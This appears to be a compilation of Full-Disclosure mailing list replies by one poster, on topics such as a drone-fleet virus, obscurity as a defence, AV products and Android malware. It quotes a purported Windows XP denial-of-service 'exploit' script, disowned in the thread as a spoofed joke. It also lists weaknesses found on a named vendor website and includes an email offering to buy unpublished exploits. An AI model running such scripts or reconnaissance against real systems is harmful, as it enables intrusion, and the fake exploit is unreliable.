from:"Elazar Broad"

Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”

2011-10-10 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

The report states that they have been using flash drives for map
and video data transfer. The source is probably some flight
operators personal drive which never came under the microscope,
that and "well...it's an *isolated* network so proper security
posture is moot" make for an easy target. I still like the fact
that real-time drone video can be viewed using SkyGrabber, don't
most local LEO use the same technology(albeit on a smaller scale)?
I'm sure many criminals and organized crime can afford a DVB-S
card...

My devalued .002

elazar

On Mon, 10 Oct 2011 13:36:23 -0400 "Thor (Hammer of God)"
 wrote:
>Consider the source.  It’s “someone close” to the operations, and
>that only according to this guy.  It could very well be a slot-
>puller in the casino across the street…   I’m always dubious of
>the reporting of this type of thing where the source is some
>“secret” person, and where there is never any ability to refute
>claims.
>
>t
>
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian
>Sciberras
>Sent: Monday, October 10, 2011 7:05 AM
>To: Michael T
>Cc: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] “We keep wiping it off, and it
>keeps coming back”
>
>I'm talking more about their engineers than their network.
>
>If I had my network infected with a virus, I'd immediately deploy
>some form of logging/monitoring tool (eg, wireshark).
>
>Honestly, it all sounds like they're employing inexperienced
>engineers. Which is again strange, considering the field they're
>in.
>
>Regarding your bet, see that's already something. Why exactly
>can't they verify your bet? It isn't like viruses suddenly became
>invisible, is it?
>
>I'm just curious to these questions. It's strange to hear someone
>saying "we basically have no idea what's going on".
>
>
>On Mon, Oct 10, 2011 at 3:40 PM, Michael T
>mailto:mt2410...@gmail.com>> wrote:
>It's a network that's 'detached', or 'segregated', or whatevered
>from the rest of the world, so it's 'largely immune to viruses'.
>That likely means they have:
>1. NO logging
>2. NO anti-virus
>3. NO hardening
>
>The very fact that these systems are on a segregated network means
>they are probably more frail, and more susceptible to viruses,
>than a normal person's laptop.
>
>Immune to viruses...  What a crock of shit.  My bet is that it's
>coming from the planes.
>
>Mike
>On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras
>mailto:uuf6...@gmail.com>> wrote:
>http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/
>
>This is news to me.
>
>Moreover, I'm a bit confused as to how they don't track how it's
>coming back.
>I mean, how is it possible that no one stepped in and analyzed how
>the virus acts and where it came from?
>
>It sounds fish if you ask me.
>
>Chris.
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAk6TM8wACgkQi04xwClgpZivsAQAiOGPaAUQ5AUfHzd9JbTZeJzo8kRl
GvWrTNcLgMQTqySuBWDpIqjo/9cWVjAlKZ+ucqibWYc38gwETIbVMbBxR4WQq2YAuDoJ
yR49pcvkSvMy+qzUi4s8WDBf7kDOh9q88Db22Dee8EUuM+2CsWjCMQa1JYTLuEg0rhvZ
biT3tHg=
=AiuT
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Rate Stratfor's Incident Response

2012-01-12 Thread Elazar Broad

"Sounds like this industry could benefit from these kids even more
since they are driving home the points you all are supposed to be
warning them about."

That's because these kids don't have mouths to feed and a paycheck to
worry about. Ethics and ethos are all very nice when you have nothing
to lose, all to gain and no one depending on you...

On Thursday, January 12, 2012 at 4:43 AM, Laurelai  wrote:
  On 1/12/12 3:34 AM, doc mombasa wrote:i dont know if
you ever worked for a big corporate entity?   like kovacs wrote
its not about whether you can do it or not as an employee its
more about if your manager allows you the time to do it  
pentesting doesnt change anything on the profits excel sheet  
   we can agree it looks bad when shit happens but they usually   
 dont think that far ahead   i tried once reporting a very simple
sql injection flaw to my manager and including a proposed fix
which would take all of 5 minutes to implement   18 months
went by before that flaw was fixed because there was no
profits in allocating resources to fix it   and that webapp was
the #1 money generator for that company
   Den 12. jan. 2012 10.29 skrev Laurelai :
 On 1/12/12 3:27 AM,
doc mombasa wrote:
just one question why should they hire the
"skiddies" if most of   them only know how to fire
up sqlmap or whatever   current app is hot right
now? doesnt really seem like enough reason to hire
  anyone besides im not buying
the whole "they do it   because they are angry at
society" plop ive been there.. they do it for the
lulz
  Den 11.
jan. 2012 06.18 skrev Laurelai :
On 1/10/12 10:18 PM, Byron
Sonne wrote:
 >> Don't piss off a talented adolescent  
  with computer skills.
 > Amen! I love me some stylin' pwnage :)
 >
 > Whether they were skiddies or actual   
 hackers, it's still amusing (and
 > frightening to some) that companies who
really should know better, in
 > fact, don't.
 >
  And again, if companies
hired these people, most   of whom come from
   disadvantaged backgrounds and are self taught
they   wouldn't have as much
   a reason to be angry anymore. Most of them feel
  like they don't have any
   real opportunities for a career and they are
often   right. Microsoft
   hired some kid who hacked their network, it is
a   safe bet he isn't going
   to be causing any trouble anymore. Talking
about   the trust issue, who
   would you trust more the person who has all the
  certs and experience
   that told you your network was safe or the 14
year   old who proved him
   wrong? We all know if that kid had approached  
microsoft with his exploit
   in a responsible manner they would have
outright   ignored him, that's why
   this mailing list exists, because companies
will   ignore security issues
   until it bites them in the ass to save a buck.
   People are way too obsessed with having
  certifications that don't
   actually teach practical intrusion techniques.
If   a system is so fragile
   that teenagers can take it down with minimal   
   effort then there is a
   serious problem with the IT security industry. 
 Think about it how long
   has sql injection been around? There is
absolutely   no excuse for being
   vulnerable to it. None what so ever. These kids
  are showing people the
   truth about the state of security online and
that   is whats making people
   afraid of them. They aren't writing 0 days
every   week, they are using
   vulnerabilities that are public

Re: [Full-disclosure] Windows XP denial of service 0day found in CTF exercise

2012-04-17 Thread Elazar Broad


Received-SPF: softfail (lists.grok.org.uk: transitioning domain of  
a...@infosecinstitute.com does not designate 46.167.245.118 as  
permitted sender)

Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk 
(Postfix) with ESMTP id D4324C0
for ;Tue, 17 Apr 2012 07:58:09 +0100 
(BST)



At least configure your SPF record policy to hard fail, and consider Domain 
Keys and/or DMARC.

elazar

On Tuesday, April 17, 2012 at 10:40 AM, a...@infosecinstitute.com wrote:Guys, 
this is a fake release, someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.




>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions
>>
>> Has not been tested for potential privilege escalation vectors.
>>
>> We first wrote about Immunity Debugger here:
>> http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/
>>
>>  Discovered by a student that wishes to remain anonymous in the
>> course CTF. This 0day exploit for Windows was discovered by a
>> student in the InfoSec Institute Ethical Hacking class, during an
>> evening CTF exercise. The student wishes to remain anonymous, he
>> has contributed a python version of the 0day. A patch that can be
>> applied to Windows has not been made available. You can find a
>> python version of the exploit to copy and paste here:
>>
>>
>> #!/usr/bin/python #Windows XP denial of service 0day exploit
>> discovered on 4.9.12 by InfoSec Institute student #For full write
>> up and description go to
>> http://www.infosecinstitute.com/courses/ethical_hacking_training.html
>>
>>
> import sys
>> import os import time import getopt import socket
>>
>> class Error(Exception): def __init__(self, error):
>> self.errorStr=error  def __str__(self): return repr(self.errorStr)
>>
>> class Exploit():
>>
>> def __init__(self, targetHost, targetPort): self.targetHost =
>> targetHost
>>
>> def exploit(self, targetHost, targetPort):
>>
>> try: socket.inet_aton(targetHost) s =
>> socket.socket(socket.AF_INET,socket.SOCK_STREAM)
>> s.connect((targetHost,targetPort)) except socket.error: raise
>> Error("Unable to exploit (Connect failed.)") sys.exit(0)
>>
>> # exploit try: s.sendto("\n\n\n", (targetHost, targetPort))
>> except: raise Error("Unable to exploit (Exploit failed.)")
>>
>> def usage(): print "[!] Usage:" print "  ( -h, --help ):" print "
>> Print this message." print " ( --targetHost= ): Target host." print
>> "--targetHost=127.0.0.1" print " ( --targetPort= ): Target
>> port." print "   --targetPort="
>>
>> def main(): print "[$] Windows XP 0Day" try: opts, args =
>> getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=",
>> "targetPort="]) except getopt.GetoptError, err: # Print help
>> information and exit: print '[!] Parameter error:' + str(err) #
>> Will print something like "option -a not recognized" usage()
>> sys.exit(0)
>>
>> targetHost=None targetPort=None  for opt, arg in opts: if opt in
>> ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost":
>> targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I
>> would be assuming to say we'll never get here. print "[!] Parameter
>> error." usage() sys.exit(0)  if not targetHost: print "[!]
>> Parameter error: targetHost not set." usage() sys.exit(0)
>>
>> if not targetPort: print "[!] Parameter error: targetPort not
>> set." usage() sys.exit(0)
>>
>> exploit = Exploit(targetHost, targetPort)
>>
>> print "[*] Attempting to exploit:"  try:
>> exploit.exploit(targetHost, int(targetPort)) except Error as
>> error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0)
>> print "[*] Exploit appears to have worked."
>>
>> # Standard boilerplate to call the main() function to begin # the
>> program. if __name__=='__main__': main()
>>
>>
>>
>> ___ Full-Disclosure -
>> We believe in it. Charter:
>> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
>> sponsored by Secunia - http://secunia.com/
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.12 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
>
> iQIcBAEBAgAGBQJPjWNjAAoJEIH7slQlJAgKlw4P/0AzWqUuogRtF9wP2K91qFXq
> QVHn9h6QlaVZ8SfunKn/zypiVmjqg2eJqSiqy8MzGIF1yRUf28W81Ugugqq62kvL
> hFJcprsUhwnJCXZn+cWfPn64qoFKbN8uzIt85eWLcIBpIvdS7M5xm0g5Eva4hFrI
> CqFmyfH+HwF4emZ0pecJ207ePetx51qj27Hgfd5Wey8W4Mx2svJpaTnCJMvcvg3i
> FqE3/APG1qRrvFt0Qilqm6hpqSXhulQQQ8qw8k5BcHRn9FwJiDNQu/ykbSajOH4g
> z452bxVBK/IQ7QQB+sqwvhi+fMIOE2f0Saw/SDgGUGLlUSPg3aQ/7pFjf3VxbaL9
> K7xG3GFQp8g3Lp5Lvr0JkhNoePb0smymSTQ5o9NoTTAKELB/9lqSHOD4HEEGR09J
> DoZTYh7ee8DVPiGI+ttatYYw4mQAJR89E98skirX0Tntn2XQNPdlcejZwPWH56PV
> jB4+uKIlsQ0KgnbK5OSLVRFgxcq9OSK/pUEZPLPuAVJrkf17TfhF8by0lJYmyW8T
> 6Qf8GMiQjtP1ovL3BDuyxzAm9n3OpUMudXdtqBFq5XuagnImR2yZZ

Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release

2011-06-23 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Most people charge for that, the least Juan could do is give you a
*free* "license" for his scamware(we know you want it ;) ).

Ah, the state of so-called "security" these days...it's
sad.

elazar

On Wed, 22 Jun 2011 23:38:06 -0400 adam  wrote:
>*cough*
>
>*Directory indexes enabled:*
>http://www.insecurityresearch.com/wp-includes/
>http://www.insecurityresearch.com/wp-content/uploads/
>http://www.insecurityresearch.com/wp-content/plugins/wp-pagenavi/
>http://www.insecurityresearch.com/wp-content/plugins/wp-
>postratings/
>
>*Path disclosure:*
>http://www.insecurityresearch.com/wp-content/themes/eVid/
>
>*Other:*
>
>   - Using outdated version of SSL
>   - Outdated SSL Certificate (2009)
>   - Outdated version of mod_frontpage (which may be vulnerable to
>a root
>   access exploit)
>   - At *least* a dozen broken links
>   - MySQL is exposed to the internet
>
>Blah blah blah. Some of these may or may not be serious but the
>fact is: it
>took less than 60 seconds to find all of it. Imagine what someone
>who is *
>really* bored could find. I think I'll pass on your oh so special
>*hacker*
> tool.
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAk4DWBoACgkQi04xwClgpZjqngP7BS/OSkELU/BGjpOSepaYERwBn47U
k+pRpovVjQHLQTxNpV9cVm0HEGq8DGacPvTtQ/1F9krmA3KzwpcJrX/71sNyKIlWofAI
XTVteAtIBL9ic9N0FTZq0QZpqKC5Ea2I/NXUE9+n7yz1X6jX6zMru/hJVKHqARVQ8Wvh
U4lFMoo=
=XzNo
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] printers used for espionage

2011-07-12 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


http://www.eff.org/issues/printers

On Tue, 12 Jul 2011 16:48:45 -0400 Jason Ellison
 wrote:
>list,
>
>  Sometime ago I remember reading an article on printers being
>used to
>gain intelligence in an embassy  or government agency.  The
>printer
>had a modified firmware... Did anyone else read that?  Or was I
>dreaming again?
>
>  The recent articles about this tactic being used against the US
>reminded me of the covert printer surveillance program... but now
>I
>can find no mention of it.
>http://technology.newsplurk.com/2011/07/dhs-imported-gadgets-
>possibly-include.html
>
>-infotek
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAk4dLtcACgkQi04xwClgpZihKgQAh+eqJuiAoMSVLYKMHHREAkYD0DcV
QmVU+n9xwbuwsj8/iEAL4YU247M531IZSOjLJKSPxMeMUP9YCYVcCMREDf+ZFAymL93V
6cM9n8nVgHtsaNIecymalHBSEWANhaXjcWwkeH7s2mymAT3Kh4q29nw1agUAOdoyXbSg
jnqEwco=
=LJJ5
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Vulnerability research and exploit writing

2012-04-24 Thread Elazar Broad

Ferenc,
 I got one as well a few weeks ago. I suspect you are correct in your 
assumption.

elazar

On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs  wrote:
>
>Hi,
>
>Anybody else got this message? I think they are "spamming" the
>subscribers/regular participants of the list.
>
>-- Forwarded message --
>From: steve ruskin 
>Date: Tue, Apr 24, 2012 at 9:56 AM
>Subject: Vulnerability research and exploit writing
>To: tyr...@gmail.com
>
>
>
>  Hi ,
>
>** **
>
>Trust all is well. I saw your experience in the field of 
>vulnerability and
>exploit research and we have a scheme in our company to 
>collaborate with
>researchers all over the world where we pay them on research done 
>by them.
>Our interest is exploits which run over Windows 7, Snow Leopard 
>with
>applications such MS Office, Adobe, Browsers, Media Player , 
>Notepad etc
>along with native OS exploits as well as iphone, blackberry 
>exploit. These
>exploits should be unpublished though the vulnerability may be 
>public. We
>also have requirements to help us do ASLR and DEP bypass for 
>exploits
>researched by us.
>
>** **
>
>Once you let us know about your skills and ideas we can provide 
>you with
>our empanelment form via which you can register. We will look 
>forward to
>your prompt response.
>
>** **
>
>Warm Regards,
>
>Steve Ruskin
>
>**
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>-- 
>Ferenc Kovács
>@Tyr43l - http://tyrael.hu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] server security

2012-06-22 Thread Elazar Broad

+1

The less an attacker knows about your infrastructure the better, as long as you 
are not solely relying on that obscurity to protect said infrastructure. 
Consider this: the more an attacker has to poke around because your aren't 
running certain services on their default port, or say disabling client 
scripting on your .NET Regex validator so that the validation expression isn't 
exposed in the page, the more noise said attacker is going to make while 
performing reconnaissance, and the better the chance that they will be detected 
by any detective controls that are in place.

My .0002

elazar

On Thursday, June 21, 2012 at 3:26 PM, Thor (Hammer of God) 
 wrote:
>
>I completely agree with Gage.  The way I see it, security through 
>obscurity is perfectly valid as long as the control remains 
>obscured.  I think the "anyone can just scan your ports" is 
>somewhat specious in that most (if not something like 99% or so 
>(unqualified opinion of course)) traffic is simply noise and scans 
>for standard ports.  This is particularly true when it matters 
>most: during a worm outbreak or a newly published vulnerability.  
>Attackers simply don't have the time nor the inclination to go 
>through and perform slow and loud scans when they can quickly move 
>on to the next target.  If 90% of the targets have services on the 
>default ports, then it makes far more sense to just go after the 
>easily targets.  
>
>Perfect case-in-point is the recent RDP unpleasantness.   Non-
>standard port deployments were automatically removed from the 
>target scans for 3389.  I don't see how any can argue against the 
>security value of such a configuration.
>
>t  
>
>
>
>Timothy "Thor"  Mullen
>www.hammerofgod.com
>Thor's Microsoft Security Bible
>
>
>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
>Sent: Thursday, June 21, 2012 9:25 AM
>To: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] server security
>
>Well thats a bit of an iffy one. I'd say it IS a security measure, 
>albeit one that is solely effective if and only if compounded with 
>other measures.
>
>It's unlikely, but you never know, you just might miss out on a 
>nasty worm all because you werent running on a  default port one 
>day.
>
>On Thu, Jun 21, 2012 at 8:52 AM, Rob  
>wrote:
>> We need to make a distinction between security and obscurity 
>here. The only time changing ports actually hardens a service in 
>any way is when the port requires elevated rights to bind, 
>changing to 1025 for example removes the root requirement. Any 
>actual or theoretical vulnerabilities still exist. If somebody is 
>looking at your server, they'll find the port without much 
>trouble. Alternate ports can remove junk traffic from logs, so 
>there is a benefit, if not entirely a security one.
>>
>> Rob
>>
>>
>> Sent on the Sprint® Now Network from my BlackBerry®
>>
>> -Original Message-
>> From: Alex Dolan 
>> Sender: listbou...@securityfocus.com
>> Date: Thu, 21 Jun 2012 07:44:57
>> To: Littlefield, Tyler
>> Cc: 
>> Subject: Re: server security
>>
>> One tip I have is to set SSH to a port other than 22, I don't 
>need to 
>> tell anyone how devastating it is if someone did actually get 
>access 
>> to that service. Putting it on some other port reduces your risk
>>
>> On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler 
> wrote:
>>> Hello:
>>> I have a couple questions. First, I'll explain what I did:
>>> I set up iptables and removed all unwanted services. Iptables 
>blocks 
>>> everything, then only opens what it wants. I also use the 
>addrtype 
>>> module to limit broadcast and unspec addresses, etc. I also do 
>some 
>>> malformed packet work where I just drop everything that looks 
>>> malformed (mainly by the flags).
>>> 2) I secured ssh: blocked root logins, set it up so only users 
>in the 
>>> sshusers group can connect, and set it only to allow ppk.
>>> 3) I installed aid.
>>> 4) disabled malformed packets and forwarding/etc in sysctl.
>>> This is a basic web server that runs email, web and a couple 
>other things.
>>> It's only running on a linode512, so I don't have the ability 
>to set 
>>> up a ton of stuff; I also think that would make things more of 
>a 
>>> mess. What else would be recommended?
>>> Also, I'm looking to add something to the web server; sometimes 
>I 
>>> notice that there are a lot of requests from people scanning 
>for 
>>> common urls like wordpress/phpbb3/etc, what kind of 
>preventative measures exist for this?
>>>
>>>
>>> --
>>> Take care,
>>> Ty
>>> http://tds-solutions.net
>>> The aspen project: a barebones light-weight mud engine:
>>> http://code.google.com/p/aspenmud
>>> He that will not reason is a bigot; he that cannot reason is a 
>fool; 
>>> he that dares not reason is a slave.
>>>
>>>
>>> 
>-
>>> --- Securing Apache Web Server with

Re: [Full-disclosure] looking for enterprise AV solution

2010-10-27 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+1 for Vipre, its cheap(about $10 or less per seat, per year),
generally resource conscious and pretty granular centralized policy

management and last but not least, its detection and fp to fn ratio
is pretty solid. Aside from a recent issues with its Outlook
plugin(which have been fixed) and some engine update deployment
issues on a handful of machines(there is a workaround), my overall
experience has been quite good.

On Wed, 27 Oct 2010 06:36:24 -0400 James Rankin
 wrote:
>Ditto on the belt and braces approach.
>
>I've had a lot of good experiences with Sunbelt's Vipre product.
>It is
>extremely easy to deploy and manage in the enterprise.
>
>On 27 October 2010 11:32, Jamie Riden 
>wrote:
>
>> On 26 October 2010 19:26, bk  wrote:
>> > (resending from correct account)
>> > On Oct 26, 2010, at 6:55 AM, Mikhail A. Utin wrote:
>> >
>> >> Folks,
>> >> We are looking an enterprise level AV-software . Any
>advising?
>> >
>> > Signature-based AV is a dead technology.  Updates don't get
>released
>> until hours after you're already infected, so all it really ends
>up doing is
>> being a resource-suck on your CPUs and hard-disk access.
>> >
>> > My recommendation:  Buy whatever has the highest composite
>score for ease
>> of management, limited resource consumption, and affordability.
>> >
>> > Anyone who says "get Vendor X" or "get Brand Y" without
>telling you what
>> selection criteria they used is a tool.  How do you know if what
>is
>> important to you was also important to them in making the
>selection?
>>
>> If you've got a decent perimeter, it should keep the threats out
>for
>> some time, but I tend to agree. AV these days is starting to be
>more
>> about detection than prevention - it will at least highlight
>that you
>> have a problem so you can deal with it. Think of it as part of
>your
>> intrusion detection if it helps.
>>
>> Oh, and somewhere I used to work ran two separate AV products on
>the
>> mail gateway, and then a third on desktops on servers. I suspect
>this
>> was more about licensing models (couldn't do per-seat for email
>as we
>> had >100k email addresses) than paranoia, but it did help out
>> considerably to have independent engines.
>>
>> cheers,
>>  Jamie
>> --
>> Jamie Riden / ja...@honeynet.org / jamie.ri...@gmail.com
>> http://uk.linkedin.com/in/jamieriden
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>--
>"On two occasions...I have been asked, 'Pray, Mr Babbage, if you
>put into
>the machine wrong figures, will the right answers come out?' I am
>not able
>rightly to apprehend the kind of confusion of ideas that could
>provoke such
>a question."
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkzIXNQACgkQi04xwClgpZh7/AP9FmLXwe93hL0OnOMMhiJ8K5oU7Ato
VjUiFNaj/Ycs4COh8LUrKJ0rTCseX5ye0AThaXJpiXgLs0kxxkrFbQQBF0zhCsTyWivL
E+vGcId/B8D2C46NfEvPgNsLtd96sRYY6e0qoV42+vEX08aiV/3rlRM9xKnXsk9i91Kt
JURFGks=
=/He8
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] virus in email RTF message MS OE almost disabled

2010-11-23 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Putting Phd, CISSP after your name combined with your original
request isn't going to get you much love on this list, but then
again, so much for the 30,000 ft birds eye academic view of
security(and we wonder why the so called *industry* is such a
failure...).

Now for some practical advice that they probably didn't teach you
in your Phd class or in the Sybex(or whatever you used) CISSP book:
If you were running with admin privileges when you opened that
attachment, as with most modern malicious code, they are
*generally* not worth trying to clean (hint..hint blended threats).
Backup your stuff, dban the drive(zero's, 1 pass) and rebuild the
box.


elazar
On Tue, 23 Nov 2010 09:26:49 -0500 "Mikhail A. Utin"
 wrote:
>As we see, our list has a few (luckily just a few) unprofessional
>people thinking of themselves as gods, and hiding in such Russian-
>born domains. It's useless to engage in any discussion as they
>have too much time and will waste our time as well. And it's
>useless to explain ethics, security basics, and our experience as
>they are kiddies. Eventually they will grow ... may be.
>
>List, thank you very much
>
>Mikhail A. Utin, CISSP
>Information Security Analyst
>Commonwealth Care Alliance
>30 Winter St.
>Boston, MA
>TEL: (617) 426-0600 x.288
>FAX: (617) 249-2114
>http://www.commonwealthcare.org
>mu...@commonwealthcare.org
>
>
>-Original Message-
>From: Thor (Hammer of God) [mailto:t...@hammerofgod.com]
>Sent: Monday, November 22, 2010 4:52 PM
>To: Mikhail A. Utin
>Cc: full-disclosure@lists.grok.org.uk
>Subject: RE: virus in email RTF message MS OE almost disabled
>
>Keep it on the list.  No need for private emails if you need
>assistance - give everyone a chance!
>
>My response was far more useful than your post - "I got pwned by
>an Office virus by opening an attachment in OE - What could it
>be??"  Jeeze dude.  And I didn't give any "adice" about "Noton."
>I said to get someone professional, which you *clearly* need to
>do.
>
>You should look up these guys:
>http://www.rubos.com/pisa.html
>
>Apparently they are Information System Security Professionals, and
>they are in the same town as you.  One even has a CISSP, so you
>KNOW that he knows what he is doing.  Funny thing is that he has
>the exact same name as you do.  What are the chances of that?  If
>these guys formed the company to sell services to businesses and
>individuals to comply with legal security and privacy
>requirements, then they should be able to figure out how to find
>an Office virus on XP, right?
>
>You can even join them as "Security professionals and experienced
>Information Sestems professionals are welcome."  I'm not sure what
>a "Sestems professional" is, but it must be very important work.
>
>Waste of time indeed.  Apple Stores are hiring "geniuses" for the
>holidays - even they know how to use XP and could help.
>
>t
>
>
>
>
>
>From: Mikhail A. Utin [mailto:mu...@commonwealthcare.org]
>Sent: Monday, November 22, 2010 1:26 PM
>To: Thor (Hammer of God)
>Subject: RE: virus in email RTF message MS OE almost disabled
>
>Your email is useless. It is on my home PC. If you have better
>adice than using Noton SW, then please use your mind to get
>something minigful.
>If you can name the virus or where to find its instance, it would
>be a help. Otherwise do not waste you and my time.
>
>From: Thor (Hammer of God) [mailto:t...@hammerofgod.com]
>Sent: Monday, November 22, 2010 3:17 PM
>To: Mikhail A. Utin; full-disclosure@lists.grok.org.uk
>Subject: RE: virus in email RTF message MS OE almost disabled
>
>You know, every time I start to get a bit of hope for what looks
>like an upward trend of businesses and organizations taking
>security seriously, I see crap like this.  Your organization is a
>Medicare prescription contractor with a national network of 61,022
>contracted pharmacies, and not only are you running unpatched
>versions of old OS's and opening email attachments because they
>"look OK," but you have to post to Full Disclosure asking help for
>trivial virus detection and removal advice?   Now that everyone on
>FD knows that you are vulnerable and that you open email
>attachments, you've probably just caused the organization to be
>pwned 9 ways from Sunday.
>
>To answer your question, call a professional and have them do it. 
>And in the future, don't send out emails like this from your
>organization email announcing the state of your security.  That's
>what Hotmail is for. 
>
>t
>
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-
>disclosure-boun...@lists.grok.org.uk] On Behalf Of Mikhail A. Utin
>Sent: Monday, November 22, 2010 7:18 AM
>To: full-disclosure@lists.grok.org.uk
>Subject: [Full-disclosure] virus in email RTF message MS OE almost
>disabled
>
>Hello,
>Opening looking OK email message in my MS OE I've very likely got
>new kind of virus, which exploits MS Office flaw recently
>announced. Immediately after, my OE started consuming huge memo

Re: [Full-disclosure] Android and malware

2010-11-24 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

It is definitely possible(http://www.cultofmac.com/android-app-
sends-personal-data-to-china/52929), there have been several well
know local root exploits(i.e. http://c-
skills.blogspot.com/2010/08/please-hold-line.html) for the Android
system, though it may be a busted proximity sensor. Just my .02...

On Tue, 23 Nov 2010 22:46:05 -0500 Eyeballing Weev
 wrote:
>Hello
>
>My friend is a public official and he believes his Android (HTC
>Dash)
>was bugged/infected by someone through a text message attachment.
>Has
>anyone seen anything commercially available or available online to
>do this?
>
>I don't know anything about smartphones but was wondering if
>anyone has
>Android experience with something like this. Does the Android have
>
>startup functions like Windows's Startup folder where we can
>investigate?
>
>The issues are a real bad echo, the phone acting really weird such
>as
>the battery life going bad and the phone lighting up on the table
>during
>it being idle.
>
>Thank you
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkztOkQACgkQi04xwClgpZj7oAP9G2jMTkId1KjJyZZvsALO/U7tWyLt
/WzmYzwW4kniD9eErfrHgsX3pF+vje+Cvwg9gjPoFQAMitkRcZ2Qbgwvi6ikrS5/52uF
c/CTgr4lTMN86laGeSP5Fj3dZsuUNJYdKE/KCGwLYhZbT6HfCLqW6vwHtk4mF96h7XM1
H78vhI4=
=ZGNx
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Just lightly scratching the surface, KeyScrambler.sys is signed by
GlobalSign, strings reveals nothing interesting other than OpenSSL
0.9.8a is used.

elazar

On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault
 wrote:
>Call me paranoid, but that sure would be a good way to spread a
>key logger!
>
>Gary B
>
>
>On 12/09/2010 07:25 AM, Christian Sciberras wrote:
>> Dave,
>>
>> That's ok. Glad to have helped out :)
>>
>> Cheers,
>> Chris.
>>
>>
>>
>> On Thu, Dec 9, 2010 at 1:07 PM, mrx > wrote:
>>
>> On 09/12/2010 10:26, Christian Sciberras wrote:
>> >> I tried installing this plugin to Firefox 3.6.12 in a
>virtualbox
>> XP32(SP3)
>> > environment and it is incompatible.
>> >> I may wait for an update to the plugin and analyse its
>behaviour,
>> > providing my curiosity doesn't wane in the meantime.
>>
>> > Alternatively, you can just decompress the XPI (it's in fact a
>zip) and
>> > inspect the js files and/or decompress any binaries.
>> > I suppose they are distributing some form of driver, so you'd
>find
>> > IDA/ollydbg useful.
>>
>>
>>
>> > Chris.
>>
>>
>> I extracted the files (various .js files and an exe) from the
>xpi.
